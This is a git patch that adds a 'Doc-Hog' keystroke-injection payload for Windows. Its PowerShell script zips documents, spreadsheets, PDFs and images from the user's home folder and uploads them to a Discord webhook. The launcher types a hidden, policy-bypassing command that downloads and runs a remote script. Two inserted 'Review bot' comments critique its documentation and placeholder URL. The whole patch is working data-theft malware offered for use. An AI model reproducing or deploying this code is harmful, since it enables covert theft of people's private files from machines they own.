From d54cb1929051fb0f28be6982a10b0bafdb054821 Mon Sep 17 00:00:00 2001
From: Gavin Kramer <75549184+atomiczsec@users.noreply.github.com>
Date: Thu, 13 Jul 2023 15:54:00 -0400
Subject: [PATCH] Add files via upload
---
payloads/library/exfiltration/Doc-Hog/d.ps1 | 51 +++++++++++
.../library/exfiltration/Doc-Hog/payload.txt | 14 +++
.../library/exfiltration/Doc-Hog/readme.md | 87 +++++++++++++++++++
3 files changed, 152 insertions(+)
create mode 100644 payloads/library/exfiltration/Doc-Hog/d.ps1
create mode 100644 payloads/library/exfiltration/Doc-Hog/payload.txt
create mode 100644 payloads/library/exfiltration/Doc-Hog/readme.md
diff --git a/payloads/library/exfiltration/Doc-Hog/d.ps1 b/payloads/library/exfiltration/Doc-Hog/d.ps1
new file mode 100644
index 000000000..77508676b
--- /dev/null
+++ b/payloads/library/exfiltration/Doc-Hog/d.ps1
@@ -0,0 +1,51 @@
+function Doc-Hog {
+ [CmdletBinding()]
+ param (
+ [parameter(Position=0,Mandatory=$False)]
+ [string]$file,
+ [parameter(Position=1,Mandatory=$False)]
+ [string]$text
+ )
+
+ $hookurl = 'DISCORD-WEBHOOK'
+
+ $Body = @{
+ 'username' = $env:username
+ 'content' = $text
+ }
+
+ if (-not ([string]::IsNullOrEmpty($text))) {
+ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
+ }
+
+ if (-not ([string]::IsNullOrEmpty($file))) {
+ curl.exe -F "file1=@$file" $hookurl
+ }
+}
+
+$Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse
+
+$types = @{
+ "*.docx" = "Word";
+ "*.doc" = "Word";
+ "*.pptx" = "PowerPoint";
+ "*.xlsx" = "Excel";
+ "*.pdf" = "PDF";
+ "*.jpeg" = "JPEG";
+ "*.png" = "PNG";
+ "*.jpg" = "JPEG";
+ "*.csv" = "CSV";
+ "*.txt" = "Text";
+}
+
+foreach ($type in $types.Keys) {
+ $filteredFiles = $Files | Where-Object {$_.Name -like $type}
+
+ if ($filteredFiles) {
+ $zipFile = "$env:TEMP\$($types[$type]).zip"
+
+ $filteredFiles | Compress-Archive -DestinationPath $zipFile
+
+ Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files"
+ }
+}
diff --git a/payloads/library/exfiltration/Doc-Hog/payload.txt b/payloads/library/exfiltration/Doc-Hog/payload.txt
new file mode 100644
index 000000000..65c190079
--- /dev/null
+++ b/payloads/library/exfiltration/Doc-Hog/payload.txt
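Review bot: d.ps1 has no comment-based help, so its footprint can only be learned by tracing the body. A `.SYNOPSIS`/`.DESCRIPTION` block above `function Doc-Hog` should state the three observable effects: recursive enumeration of ten file extensions under `$env:HOMEPATH`, one archive per type written to `$env:TEMP` (`Word.zip`, `PDF.zip`, and so on) with no cleanup step in the script, and outbound posts to `$hookurl` from both `Invoke-RestMethod` and a child `curl.exe -F` process. Those effects are also what a defender triaging this file would look for in file-creation, process-creation and proxy logs.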
@@ -0,0 +1,14 @@
+REM Title: Doc-Hog
+REM Author: atomiczsec
+REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
+
+DEFINE URL http://new-url.com/powershell.ps1
+
+REM Target: Windows 10
+QUACK DELAY 2000
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
+QUACK ENTER
+REM Remember to replace the link with your DropBox shared link for the intended file to download
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Doc-Hog/readme.md b/payloads/library/exfiltration/Doc-Hog/readme.md
new file mode 100644
index 000000000..833d12fac
--- /dev/null
+++ b/payloads/library/exfiltration/Doc-Hog/readme.md
@@ -0,0 +1,87 @@ + +
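Review bot: In payload.txt, `DEFINE URL http://new-url.com/powershell.ps1` leaves a real registrable domain over cleartext HTTP as the default, and the `QUACK STRING` line hands whatever that address returns to `iex`. A device loaded without editing the file would therefore fetch and run content from a host the operator does not control, and over plain HTTP anything on the network path can substitute the response. A placeholder that cannot resolve fails closed instead, for example `DEFINE URL https://REPLACE-ME.invalid/d.ps1` (constructed placeholder). The two closing REM lines also refer to a `?dl=0` suffix that the `DEFINE` value does not carry, and the last one runs into the stray text `mode con:cols=14 lines=1`, so the comments do not describe the file as committed.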

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Doc-Hog + +A payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV + +## Description + +This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +
+ + Link + +
+ + +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

\ No newline at end of file